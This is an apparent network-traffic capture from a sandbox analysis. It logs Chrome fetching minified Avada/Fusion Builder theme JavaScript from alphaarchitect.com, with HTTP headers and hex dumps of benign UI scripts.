                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC444INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:04 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-b7"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147821
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba350bd40f6b-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC189INData Raw: 62 37 0d 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 27 2e 66 75 73 69 6f 6e 2d 62 75 74 74 6f 6e 5b 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 5d 27 29 2e 6f 6e 28 22 6b 65 79 64 6f 77 6e 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 20 22 21 3d 3d 65 2e 6b 65 79 26 26 22 45 6e 74 65 72 22 21 3d 3d 65 2e 6b 65 79 7c 7c 28 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 74 72 69 67 67 65 72 28 22 63 6c 69 63 6b 22 29 29 7d 29 7d 29 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: b7jQuery(document).ready(function(){jQuery('.fusion-button[role="button"]').on("keydown",function(e){" "!==e.key&&"Enter"!==e.key||(e.preventDefault(),jQuery(this).trigger("click"))})})
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        140192.168.2.449898141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC836OUTGET /wp-content/cache/min/1/wp-content/plugins/fusion-builder/assets/js/min/general/fusion-container.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:04 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-4c3b"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147821
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba352b5a0cb4-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC877INData Raw: 34 63 33 62 0d 0a 66 75 6e 63 74 69 6f 6e 20 66 75 73 69 6f 6e 49 6e 69 74 53 74 69 63 6b 79 43 6f 6e 74 61 69 6e 65 72 73 28 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 66 6e 2e 73 74 69 63 6b 5f 69 6e 5f 70 61 72 65 6e 74 26 26 6a 51 75 65 72 79 28 22 2e 66 75 73 69 6f 6e 2d 73 74 69 63 6b 79 2d 63 6f 6e 74 61 69 6e 65 72 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 73 69 6f 6e 49 6e 69 74 53 74 69 63 6b 79 28 6a 51 75 65 72 79 28 74 68 69 73 29 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 66 75 73 69 6f 6e 49 6e 69 74 53 74 69 63 6b 79 28 65 29 7b 76 61 72 20 74 3d 76 6f 69 64 20 30 3d 3d 3d 65 2e 61 74 74 72 28 22 64 61 74 61 2d 74 72 61 6e 73 69 74 69 6f 6e 2d 6f 66 66 73 65 74 22 29 3f 30 3a 70 61
                                                                                                                                                                                                                                                                        Data Ascii: 4c3bfunction fusionInitStickyContainers(){"function"==typeof jQuery.fn.stick_in_parent&&jQuery(".fusion-sticky-container").each(function(){fusionInitSticky(jQuery(this))})}function fusionInitSticky(e){var t=void 0===e.attr("data-transition-offset")?0:pa
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1369INData Raw: 29 3f 65 2e 64 61 74 61 28 22 73 74 69 63 6b 79 5f 6b 69 74 22 29 7c 7c 28 6e 26 26 28 6f 2e 73 63 72 6f 6c 6c 5f 74 72 61 6e 73 69 74 69 6f 6e 3d 6e 29 2c 65 2e 63 6c 6f 73 65 73 74 28 22 2e 66 75 73 69 6f 6e 2d 74 62 2d 68 65 61 64 65 72 22 29 2e 6c 65 6e 67 74 68 7c 7c 65 2e 63 6c 6f 73 65 73 74 28 22 2e 66 75 73 69 6f 6e 2d 74 62 2d 70 61 67 65 2d 74 69 74 6c 65 2d 62 61 72 22 29 2e 6c 65 6e 67 74 68 3f 28 6f 2e 70 61 72 65 6e 74 3d 22 23 77 72 61 70 70 65 72 22 2c 6f 2e 62 6f 74 74 6f 6d 69 6e 67 3d 21 31 29 3a 65 2e 63 6c 6f 73 65 73 74 28 22 2e 66 75 73 69 6f 6e 2d 63 6f 6e 74 65 6e 74 2d 74 62 22 29 2e 6c 65 6e 67 74 68 3f 6f 2e 70 61 72 65 6e 74 3d 22 2e 66 75 73 69 6f 6e 2d 63 6f 6e 74 65 6e 74 2d 74 62 22 3a 65 2e 63 6c 6f 73 65 73 74 28 22 2e
                                                                                                                                                                                                                                                                        Data Ascii: )?e.data("sticky_kit")||(n&&(o.scroll_transition=n),e.closest(".fusion-tb-header").length||e.closest(".fusion-tb-page-title-bar").length?(o.parent="#wrapper",o.bottoming=!1):e.closest(".fusion-content-tb").length?o.parent=".fusion-content-tb":e.closest(".
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1369INData Raw: 74 2e 62 6f 74 74 6f 6d 2d 69 29 2f 74 2e 68 65 69 67 68 74 2a 31 30 30 29 29 7d 66 75 6e 63 74 69 6f 6e 20 69 6e 69 74 53 77 69 70 65 72 53 63 72 6f 6c 6c 69 6e 67 53 65 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 74 3d 7b 64 69 72 65 63 74 69 6f 6e 3a 22 76 65 72 74 69 63 61 6c 22 2c 73 70 65 65 64 3a 65 2e 64 61 74 61 28 22 73 70 65 65 64 22 29 2c 65 66 66 65 63 74 3a 22 63 72 65 61 74 69 76 65 22 2c 6f 62 73 65 72 76 65 72 3a 21 30 2c 6f 62 73 65 72 76 65 50 61 72 65 6e 74 73 3a 21 30 2c 6d 6f 75 73 65 77 68 65 65 6c 3a 7b 72 65 6c 65 61 73 65 4f 6e 45 64 67 65 73 3a 21 30 7d 2c 61 6c 6c 6f 77 54 6f 75 63 68 4d 6f 76 65 3a 21 31 2c 74 6f 75 63 68 52 65 6c 65 61 73 65 4f 6e 45 64 67 65 73 3a
                                                                                                                                                                                                                                                                        Data Ascii: t.bottom-i)/t.height*100))}function initSwiperScrollingSection(e){if(!e.length)return;const t={direction:"vertical",speed:e.data("speed"),effect:"creative",observer:!0,observeParents:!0,mousewheel:{releaseOnEdges:!0},allowTouchMove:!1,touchReleaseOnEdges:
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1369INData Raw: 66 69 6e 64 28 22 61 22 29 2e 61 64 64 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 7b 6e 28 29 7d 2c 31 30 30 29 7d 2c 73 6c 69 64 65 43 68 61 6e 67 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 5b 30 5d 2e 73 63 72 6f 6c 6c 49 6e 74 6f 56 69 65 77 28 7b 62 65 68 61 76 69 6f 72 3a 22 73 6d 6f 6f 74 68 22 7d 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 70 61 72 61 6d 73 2e 6d 6f 75 73 65 77 68 65 65 6c 2e 72 65 6c 65 61 73 65 4f 6e 45 64 67 65 73 3d 21 31 7d 2c 35 30 30 29 7d 2c 72 65 61 63 68 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 70 61 72 61 6d 73 2e 6d 6f 75 73 65 77 68 65 65 6c 2e 72 65 6c 65
                                                                                                                                                                                                                                                                        Data Ascii: find("a").addClass("active"),setTimeout(()=>{n()},100)},slideChange:function(t){e[0].scrollIntoView({behavior:"smooth"}),setTimeout(function(){t.params.mousewheel.releaseOnEdges=!1},500)},reachEnd:function(e){setTimeout(function(){e.params.mousewheel.rele
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1369INData Raw: 6a 51 75 65 72 79 28 74 68 69 73 29 2c 73 3d 6f 2e 61 74 74 72 28 22 68 72 65 66 22 29 2c 63 3d 22 23 22 21 3d 3d 73 3f 65 2e 66 69 6e 64 28 73 29 3a 22 22 3b 69 66 28 63 2e 6c 65 6e 67 74 68 29 7b 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 6c 65 74 20 65 3d 63 2e 69 6e 64 65 78 28 29 3b 63 2e 68 61 73 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 63 6f 6e 74 61 69 6e 65 72 2d 61 6e 63 68 6f 72 22 29 26 26 28 65 3d 63 2e 70 61 72 65 6e 74 28 29 2e 69 6e 64 65 78 28 29 29 2c 6e 28 6f 29 2c 69 2e 73 6c 69 64 65 54 6f 28 65 29 7d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 69 6e 69 74 53 63 72 6f 6c 6c 69 6e 67 53 65 63 74 69 6f 6e 73 28 65 29 7b 76 61 72 20 74 2c 69 2c 6e 3d 6a 51 75 65 72 79 28 22 23 63 6f 6e 74 65 6e 74 22 29 2e 66 69 6e 64 28 22 2e 66
                                                                                                                                                                                                                                                                        Data Ascii: jQuery(this),s=o.attr("href"),c="#"!==s?e.find(s):"";if(c.length){t.preventDefault();let e=c.index();c.hasClass("fusion-container-anchor")&&(e=c.parent().index()),n(o),i.slideTo(e)}})}function initScrollingSections(e){var t,i,n=jQuery("#content").find(".f
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1369INData Raw: 29 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 2c 69 3d 77 69 6e 64 6f 77 2e 6c 61 73 74 59 50 6f 73 69 74 69 6f 6e 3b 77 69 6e 64 6f 77 2e 73 63 72 6f 6c 6c 44 69 73 61 62 6c 65 64 7c 7c 6a 51 75 65 72 79 28 22 2e 66 75 73 69 6f 6e 2d 73 63 72 6f 6c 6c 2d 73 65 63 74 69 6f 6e 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 31 3c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 68 69 6c 64 72 65 6e 28 22 64 69 76 22 29 2e 6c 65 6e 67 74 68 26 26 21 6a 51 75 65 72 79 28 74 68 69 73 29 2e 68 61 73 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 73 63 72 6f 6c 6c 2d 73 65 63 74 69 6f 6e 2d 6d 6f 62 69 6c 65 2d 64 69 73 61 62 6c 65 64 22 29 26 26 6a 51 75 65 72 79 28 74 68 69 73 29 2e 66 75 73 69 6f 6e 50 6f 73 69 74 69 6f 6e 53 63 72 6f 6c 6c 53 65 63 74 69 6f 6e 45 6c
                                                                                                                                                                                                                                                                        Data Ascii: ).scrollTop(),i=window.lastYPosition;window.scrollDisabled||jQuery(".fusion-scroll-section").each(function(){1<jQuery(this).children("div").length&&!jQuery(this).hasClass("fusion-scroll-section-mobile-disabled")&&jQuery(this).fusionPositionScrollSectionEl
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1369INData Raw: 2d 73 63 72 6f 6c 6c 2d 73 65 63 74 69 6f 6e 22 29 2c 74 3d 30 2c 69 3d 30 2c 6e 3d 66 75 73 69 6f 6e 2e 67 65 74 41 64 6d 69 6e 62 61 72 48 65 69 67 68 74 28 29 3b 65 2e 6c 65 6e 67 74 68 26 26 28 6a 51 75 65 72 79 28 22 2e 66 75 73 69 6f 6e 2d 73 63 72 6f 6c 6c 2d 73 65 63 74 69 6f 6e 2e 61 63 74 69 76 65 22 29 2e 66 69 6e 64 28 22 2e 66 75 73 69 6f 6e 2d 73 63 72 6f 6c 6c 2d 73 65 63 74 69 6f 6e 2d 65 6c 65 6d 65 6e 74 22 29 2e 63 73 73 28 7b 6c 65 66 74 3a 6a 51 75 65 72 79 28 22 23 63 6f 6e 74 65 6e 74 22 29 2e 6f 66 66 73 65 74 28 29 2e 6c 65 66 74 7d 29 2c 6a 51 75 65 72 79 28 22 2e 66 75 73 69 6f 6e 2d 73 63 72 6f 6c 6c 2d 73 65 63 74 69 6f 6e 22 29 2e 66 69 6e 64 28 22 2e 66 75 73 69 6f 6e 2d 73 63 72 6f 6c 6c 2d 73 65 63 74 69 6f 6e 2d 65 6c 65
                                                                                                                                                                                                                                                                        Data Ascii: -scroll-section"),t=0,i=0,n=fusion.getAdminbarHeight();e.length&&(jQuery(".fusion-scroll-section.active").find(".fusion-scroll-section-element").css({left:jQuery("#content").offset().left}),jQuery(".fusion-scroll-section").find(".fusion-scroll-section-ele
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1369INData Raw: 65 72 63 65 6e 74 2d 68 65 69 67 68 74 2d 73 63 72 6f 6c 6c 69 6e 67 22 29 2e 63 73 73 28 22 68 65 69 67 68 74 22 2c 22 63 61 6c 63 28 31 30 30 76 68 20 2d 20 22 2b 69 2b 22 70 78 29 22 29 29 7d 29 2c 73 63 72 6f 6c 6c 54 6f 43 75 72 72 65 6e 74 53 63 72 6f 6c 6c 53 65 63 74 69 6f 6e 28 29 29 29 29 2c 6a 51 75 65 72 79 28 22 2e 68 75 6e 64 72 65 64 2d 70 65 72 63 65 6e 74 2d 68 65 69 67 68 74 2e 6e 6f 6e 2d 68 75 6e 64 72 65 64 2d 70 65 72 63 65 6e 74 2d 68 65 69 67 68 74 2d 73 63 72 6f 6c 6c 69 6e 67 22 29 2e 6c 65 6e 67 74 68 26 26 28 4e 75 6d 62 65 72 28 66 75 73 69 6f 6e 43 6f 6e 74 61 69 6e 65 72 56 61 72 73 2e 69 73 5f 73 74 69 63 6b 79 5f 68 65 61 64 65 72 5f 74 72 61 6e 73 70 61 72 65 6e 74 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65
                                                                                                                                                                                                                                                                        Data Ascii: ercent-height-scrolling").css("height","calc(100vh - "+i+"px)"))}),scrollToCurrentScrollSection()))),jQuery(".hundred-percent-height.non-hundred-percent-height-scrolling").length&&(Number(fusionContainerVars.is_sticky_header_transparent)||"function"!=type
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1369INData Raw: 72 20 74 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2c 6e 3d 4d 61 74 68 2e 63 65 69 6c 28 74 2e 6f 66 66 73 65 74 28 29 2e 74 6f 70 29 2c 6f 3d 4d 61 74 68 2e 63 65 69 6c 28 74 2e 6f 75 74 65 72 48 65 69 67 68 74 28 29 29 2c 73 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 6e 2b 6f 29 2c 63 3d 6a 51 75 65 72 79 28 22 68 74 6d 6c 22 29 2e 68 61 73 43 6c 61 73 73 28 22 75 61 2d 65 64 67 65 22 29 3f 22 62 6f 64 79 22 3a 22 68 74 6d 6c 22 3b 6e 3c 3d 65 26 26 73 3e 3d 69 3f 28 74 2e 61 64 64 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 2c 6a 51 75 65 72 79 28 63 29 2e 61 6e 69 6d 61 74 65 28 7b 73 63 72 6f 6c 6c 54 6f 70 3a 6e 2d 35 30 7d 2c 7b 64 75 72 61 74 69 6f 6e 3a 35 30 2c 65 61 73 69 6e 67 3a 22 65 61 73 65 49 6e 45 78 70 6f 22 2c 63 6f 6d 70 6c 65 74 65 3a 66 75
                                                                                                                                                                                                                                                                        Data Ascii: r t=jQuery(this),n=Math.ceil(t.offset().top),o=Math.ceil(t.outerHeight()),s=Math.floor(n+o),c=jQuery("html").hasClass("ua-edge")?"body":"html";n<=e&&s>=i?(t.addClass("active"),jQuery(c).animate({scrollTop:n-50},{duration:50,easing:"easeInExpo",complete:fu
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC1369INData Raw: 74 2e 73 65 63 74 69 6f 6e 54 6f 70 4f 66 66 73 65 74 2c 74 7d 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 6c 6f 61 64 20 66 75 73 69 6f 6e 2d 65 6c 65 6d 65 6e 74 2d 72 65 6e 64 65 72 2d 66 75 73 69 6f 6e 5f 62 75 69 6c 64 65 72 5f 63 6f 6e 74 61 69 6e 65 72 20 72 65 73 69 7a 65 22 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 69 3d 76 6f 69 64 20 30 21 3d 3d 74 3f 6a 51 75 65 72 79 28 27 64 69 76 5b 64 61 74 61 2d 63 69 64 3d 22 27 2b 74 2b 27 22 5d 27 29 2e 66 69 6e 64 28 22 2e 66 75 6c 6c 77 69 64 74 68 2d 66 61 64 65 64 22 29 3a 6a 51 75 65 72 79 28 22 2e 66 75 6c 6c 77 69 64 74 68 2d 66 61 64 65 64 22 29 2c 6e 3d 76 6f 69 64 20 30 21 3d 3d 74 3f 6a 51 75 65 72 79 28 27 64 69 76 5b 64 61 74 61 2d 63 69 64 3d 22 27 2b 74 2b 27
                                                                                                                                                                                                                                                                        Data Ascii: t.sectionTopOffset,t}jQuery(window).on("load fusion-element-render-fusion_builder_container resize",function(e,t){var i=void 0!==t?jQuery('div[data-cid="'+t+'"]').find(".fullwidth-faded"):jQuery(".fullwidth-faded"),n=void 0!==t?jQuery('div[data-cid="'+t+'


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        141192.168.2.449899141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC608OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-select.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:04 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-375"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147821
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba355f9542b3-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC878INData Raw: 33 37 35 0d 0a 66 75 6e 63 74 69 6f 6e 20 63 61 6c 63 53 65 6c 65 63 74 41 72 72 6f 77 44 69 6d 65 6e 73 69 6f 6e 73 28 65 29 7b 76 61 72 20 6e 3d 22 2e 61 76 61 64 61 2d 73 65 6c 65 63 74 2d 70 61 72 65 6e 74 20 2e 73 65 6c 65 63 74 2d 61 72 72 6f 77 2c 20 2e 67 72 61 76 69 74 79 2d 73 65 6c 65 63 74 2d 70 61 72 65 6e 74 20 2e 73 65 6c 65 63 74 2d 61 72 72 6f 77 2c 20 2e 77 70 63 66 37 2d 73 65 6c 65 63 74 2d 70 61 72 65 6e 74 20 2e 73 65 6c 65 63 74 2d 61 72 72 6f 77 22 3b 28 76 6f 69 64 20 30 21 3d 3d 65 3f 6a 51 75 65 72 79 28 65 29 2e 66 69 6e 64 28 6e 29 3a 6a 51 75 65 72 79 28 6e 29 29 2e 66 69 6c 74 65 72 28 22 3a 76 69 73 69 62 6c 65 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 30 3c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 72 65 76
                                                                                                                                                                                                                                                                        Data Ascii: 375function calcSelectArrowDimensions(e){var n=".avada-select-parent .select-arrow, .gravity-select-parent .select-arrow, .wpcf7-select-parent .select-arrow";(void 0!==e?jQuery(e).find(n):jQuery(n)).filter(":visible").each(function(){0<jQuery(this).prev
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC14INData Raw: 65 6e 73 69 6f 6e 73 28 6e 29 7d 29 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: ensions(n)})
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        142192.168.2.449900141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC839OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/awb-widget-areas.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:04 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:04 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-ded"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147821
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba356a7642e6-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
